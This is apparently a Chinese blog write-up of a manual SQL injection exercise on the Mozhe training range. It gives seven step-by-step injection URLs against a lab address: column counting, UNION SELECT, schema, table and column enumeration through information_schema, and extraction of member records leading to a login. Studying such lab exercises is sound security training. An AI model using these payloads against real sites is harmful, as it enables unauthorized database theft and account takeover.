SQL纯手工注入_靶场练习

记录一次在墨者平台的纯手工注入练习

靶场环境:https://www.mozhe.cn/bug/detail/elRHc1BCd2VIckQxbjduMG9BVCtkZz09bW96aGUmozhe

第一步:查看是否有SQL注入:

http://219.153.49.228:49363/new_list.php?id=1 and 1=2

SQL纯手工注入_靶场练习_第1张图片出错说明有SQL注入

第二步:判断字段数

http://219.153.49.228:49363/new_list.php?id=1 order by 4

SQL纯手工注入_靶场练习_第2张图片在第5个字段处出错,说明最多有4个字段

第三步:查看显示出错字段处

http://219.153.49.228:49363/new_list.php?id=1 and 1=2 UNION SELECT 1,2,3,4

SQL纯手工注入_靶场练习_第3张图片说明在第2,3处字段处出错

第四步:查看用户和当前数据库

http://219.153.49.228:49363/new_list.php?id=1 and 1=2 UNION SELECT 1,database(),user(),4

SQL纯手工注入_靶场练习_第4张图片

或查询所有数据库

http://219.153.49.228:49363/new_list.php?id=1 and 1=2 UNION SELECT 1,database(),group_concat(schema_name),4 from information_schema.schemata

SQL纯手工注入_靶场练习_第5张图片

第5步:查看当前数据库中的表

http://219.153.49.228:49363/new_list.php?id=1 and 1=2 UNION SELECT 1,database(),table_name,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup' limit 0,1#

SQL纯手工注入_靶场练习_第6张图片

第六步:查看表中的列

http://219.153.49.228:49363/new_list.php?id=1 and 1=2 UNION SELECT 1,database(),column_name,4 from information_schema.columns where table_schema='mozhe_Discuz_StormGroup' and table_name='StormGroup_member' limit 1,1#

SQL纯手工注入_靶场练习_第7张图片

第七步:查看列的值

http://219.153.49.228:49363/new_list.php?id=1 and 1=2 UNION SELECT 1,database(),name,4 from StormGroup_member limit 0,1#

SQL纯手工注入_靶场练习_第8张图片

最后成功登录:

 

你可能感兴趣的:(SQL)